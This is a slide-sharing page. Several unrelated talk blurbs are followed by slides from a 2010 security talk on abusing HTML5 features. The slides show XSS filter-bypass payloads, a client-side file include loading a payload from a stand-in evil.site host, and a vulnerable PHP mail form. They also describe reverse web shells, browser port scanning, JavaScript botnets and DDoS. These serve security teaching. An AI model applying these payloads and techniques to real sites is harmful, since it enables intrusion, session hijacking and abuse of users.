- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
5. What is HTML5
• Next major version of HTML
• Adds new tags, event handlers to HTML
• Adds new APIs to call from JavaScript
• Native support for features currently provided by
plug‐ins like Flash/Silverlight/Java
ATTACK & DEFENSE
ClubHack 2010 5 labs
7. Is HTML5 hopelessly insecure?
• Short answer ‐ NO.
• Long answer
– Security has been a major consideration in the design of
the specification
– But it is incredibly hard to add features in any technology
without increasing the possibility of abuse
This talk is about the abuse of some of HTML5’s features
ATTACK & DEFENSE
ClubHack 2010 7 labs
8. HTML5 Features featured in this talk
• New Tags and Attributes
• Cross Origin Requests
• Drag‐n‐Drop API
• Application Cache
• WebSockets
• WebWorkers
ATTACK & DEFENSE
ClubHack 2010 8 labs
10. Black‐list XSS filters
• Filters are a popular way to prevent XSS attacks when
encoding is not possible ‐ accepting rich content
from users
• White‐list filters like AntiSamy exist for this reason
• But developers like developing…..custom filters
• Almost all these filters are black‐list based
• Ofcourse we know that black‐list filters fail
• But ‘we’ are only about 0.1 % of the web community
ATTACK & DEFENSE
ClubHack 2010 10 labs
12. Bypassing Black‐list filters with HTML5 ‐ 2
• Filter blocks ‘<‘ and ‘>’, so tags cannot be injected
• But user input is being injected inside an elements’s
attribute ☺
• Filter also blocks event attributes like onerror, onload
etc
• HTML5 adds new event attributes filter bypass ☺
Eg:
<form id=test onforminput=alert(1)> <input> </form>
<button form=test onformchange=alert(2)>X
ATTACK & DEFENSE
ClubHack 2010 12 labs
13. Bypassing Black‐list filters with HTML5 ‐ 3
• Similar to case ‐2
• But filter is blocking event attributes with regex
‘onw+=‘.
• This blocks the HTML5 attributes shown earlier
• HTML5’s ‘formaction’ event attribute can bypass this
filter ☺
Eg:
<form id="test" /><button form="test“
formaction="javascript:alert(1)">X
ATTACK & DEFENSE
ClubHack 2010 13 labs
14. Self‐triggering XSS exploits with HTML5
• A common XSS occurrence is injection inside some
attribute of INPUT tags.
• Current techniques require user interaction to trigger
this XSS
<input type="text" value="‐>Injecting here"
onmouseover="alert('Injected val')">
• HTML5 turns this in to self‐triggering XSS
<input type="text" value="‐‐>Injecting here"
onfocus="alert('Injected value')" autofocus>
ATTACK & DEFENSE
ClubHack 2010 14 labs
18. Cross Origin Request (COR)
• Originally Ajax calls were subject to Same Origin
Policy
• Site A cannot make XMLHttpRequests to Site B
• HTML5 makes it possible to make these cross domain
calls
• Site A can now make XMLHttpRequests to Site B as
long as Site B allows it.
• Response from Site B should include a header:
Access‐Control‐Allow‐Origin: Site A
ATTACK & DEFENSE
ClubHack 2010 18 labs
19. Reverse Web Shell
• This feature can be abused to set up a Reverse Web
Shell
• Say vuln.site is vulnerable to XSS and an attacker
injects his payload in the victim’s browser
• This payload can now make cross domain calls to
attacker.site and read the response
• This sets up a communication channel between the
attacker and victim
• Attacker can access vuln.site from victim’s browser
by using this channel ATTACK & DEFENSE
ClubHack 2010 19 labs
21. Shell of the Future
• Tool to automate the process of creating and
accessing a Reverse Web Shell
• Tunnels the attacker’s HTTP traffic over COR from the
victim’s browser
• Attacker can browse the victim’s session from his
browser.
• Can get around Session Hijacking countermeasure
like Http‐Only and IP Address–Session ID binding
• Comes loaded with two default JavaScript exploits
• Supports HTTPS website as well ATTACK & DEFENSE
ClubHack 2010 21 labs
25. Text‐field Injection using Drag and Drop API
• Filling forms across domains is usually difficult in
Clickjacking attacks
• HTML5’s Drag and Drop API makes this easy
• Attacker convinces the victim to perform a Drag and
Drop operation
• A simple game can be convincing here
• By using frame overlays, this action can fill forms
across domains
• Introduced by Paul Stone at BlackHat Europe 2010
ATTACK & DEFENSE
ClubHack 2010 25 labs
26. How it works
• Attacker.site would contain and element like this:
<div draggable="true"
ondragstart="event.dataTransfer.setData('text/plain',
'Evil data')“><h3>DRAG ME!!</h3></div>
• When the victim starts dragging this, the event’s data
value is set to ‘Evil Data’
• Victim drops the element on to an text field inside an
invisible iframe
• That field is populated with the value ‘Evil Data’.
ATTACK & DEFENSE
ClubHack 2010 26 labs
33. Client‐side File Includes
• Have you seen URLs like these:
http://www.example.com/#index.php
• Inside the page:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function(){if(x.readyState==4){
document.getElementById("main").innerHTML=x.responseText;}}
x.send();
</script>
<div id=“main”></div>
</body></html>
ATTACK & DEFENSE
ClubHack 2010 33 labs
34. The Cross Origin Request effect
• This design though flawed was difficult to exploit
earlier
• Introducing Cross Origin Requests
http://example.com/#http://evil.site/payload.php
• Contents of ‘payload.php’ will be included as HTML
within <div id=“main”></div>
• New type of XSS!!
• Discovered by Matt Austin on touch.facebook.com
and a bunch of other sites
ATTACK & DEFENSE
ClubHack 2010 34 labs
35. XMLHttpRequest as a sink
• COR makes XMLHttpRequest as a dangerous DOM
based XSS sink
• Responses of XHR are consumed in many websites in
different ways.
Eg: JSON, XML HTML
• Since this data is supposed to be from same domain
they are usually not validated
• Huge potential for XSS vulnerabilities
ATTACK & DEFENSE
ClubHack 2010 35 labs
40. Port Scanning
• COR and WebSockets can be used for performing
reliable port scans
• The time it takes to change its readystate status
indicates the status of the port it is connecting to
– XHR depends on time spent in ReadyState 1
– WebSockets depends on time spent in ReadyState 0
• Possible to identify open, closed and filtered ports
• Scans are subject to the port blocking employed in all
popular browser
ATTACK & DEFENSE
ClubHack 2010 40 labs
41. Application‐level scanning
• These are application‐level not socket‐level scans
• The port behavior would depend on the application
running on it. Types of applications:
– Close on connect: Application terminates the connection once
connection is established due to protocol mismatch.
– Respond & close on connect: Similar to type‐1 but sends some default
response before closing connection
– Open with no response: Application keeps the connection open
expecting more data or data that would match its protocol
specification.
– Open with response: Similar to type‐3 but sends some default
response on connection, like a banner or welcome message
ATTACK & DEFENSE
ClubHack 2010 41 labs
43. Network Scanning
• Use the port scanning technique to perform
horizontal scans of the network
• Fact that we can detect closed ports makes this ideal
• Scan for port 445, it is usually allowed through
personal firewall
– Windows 7 application type‐1 easily detected
– Windows XP application type‐3 cannot be detected
• If port 3389 is also allowed across firewalls but can
only be detected if this port is closed on the system
(application type ‐3) ATTACK & DEFENSE
ClubHack 2010 43 labs
44. Guessing user’s Private IP
• Step 1: Identify the user’s subnet
– Most home users are on the 192.168.x.x subnet and the
router is 192.168.x.1
– Scanning for port 80 from 192.168.0.1 to 192.168.255.1
identifies the user’s subnet
• Step 2: Identify the user’s IP address
– Scan the subnet for a port filtered by personal firewalls –
Eg: 601337
– The only system that would respond is the user’s system,
the request does not get filtered by the firewall as it was
generated within the same machine
ATTACK & DEFENSE
ClubHack 2010 44 labs
45. JSRecon
• Its an online tool to perform port and network scans
• Uses the techniques discussed earlier
• http://www.andlabs.org/tools/jsrecon.html
• DEMO
ATTACK & DEFENSE
ClubHack 2010 45 labs
48. Why JavaScript?
• Botnets are attacker’s version of distributed
computing, made of large number of nodes
executing the attacker’s code
• JavaScript is the easiest form of code to execute in
anybody’s system
• We all execute thousands of lines of untrusted
JavaScript code in our browsers everyday during our
casual browsing sessions
• Platform & OS neutral– One language to rule them all
• Billions of potential nodes (web users) ATTACK & DEFENSE
ClubHack 2010 48 labs
50. Reaching out to victims
• Email spam
• Trending topics on Twitter
• Persistent XSS on popular websites, forums etc
• Search Engine Poisoning
• Compromised websites
The sole cause of all human misery is the inability of people to sit quietly
in their rooms ‐ Blaise Pascal
The sole cause of all browser attacks is the inability of people to leave a
link unclicked ‐ Internet version
ATTACK & DEFENSE
ClubHack 2010 50 labs
53. DDoS Attacks
• Application‐level DDoS can bring down even huge
sites
• Pick a process intensive request and make it a few
thousand times
Eg: http://target.site.com/search.php?product=%
• HTML5’s COR can make GET requests to any website
• I clocked 10,000 COR requests/minute on my laptop
• 600 nodes 100,000 requests/sec site DoSed?
• 6000 nodes?? 60000 nodes???
ATTACK & DEFENSE
ClubHack 2010 53 labs
54. Email Spam
• Primarily sent using open relay mail servers
• Web equivalent of open relay mail servers:
http://example.com/feedback.html
<form method=“GET” action=“feedback.php”>
<input type=“hidden” name=“to” value=“fb@example.com” />
From: <input type=“text” name=“from” value=“”/>
Subject: <input type=“text” name=“subject” value=“”/>
Comment: <input type=“text” name=“comment” value=“”/></form>
http://example.com/feedback.php
<?php mail($_GET[‘to’],$_GET[‘’subject], $_GET[‘comment’],
"From:”. $_GET[‘from’]); ?>
ATTACK & DEFENSE
ClubHack 2010 54 labs
55. Spam through COR
• If the form is submitted over GET then COR has no
problems
• If the form is submitted over POST then it is not
possible
• JSP applications can still be affected using HTTP
Parameter Pollution
• This attack is possible even without COR
<img src=“http://example.com/feedback.php?....”
• But COR is the only option from within WebWorkers
ATTACK & DEFENSE
ClubHack 2010
55 labs
56. Distributed Password Cracking
• JavaScript is generally not considered to be a good
platform for password cracking
• But JavaScript engines are becoming faster everyday
• How fast? – it was possible to create 100000 MD5
hashes/second in JavaScript on an I5, 4GB system
• This is still 100‐115 times slower than native code’s
performance on same machine
• ~110 nodes running JS code == 1 running native code
• What JavaScript lacks in performance, it more than
makes up in volume ATTACK & DEFENSE
ClubHack 2010 56 labs
57. Ravan – Distributed JS Computing System
• System for legitimate use of password cracking with
JavaScript
• Users are asked for permission before starting
cracking process in their browser
• Divides the cracking process in to slots and allots
them to individual workers
• The entire process is managed by the master, the
hash submitters browser
• Supports Salted MD5 and SHA hashes
• DEMO ATTACK & DEFENSE
ClubHack 2010 57 labs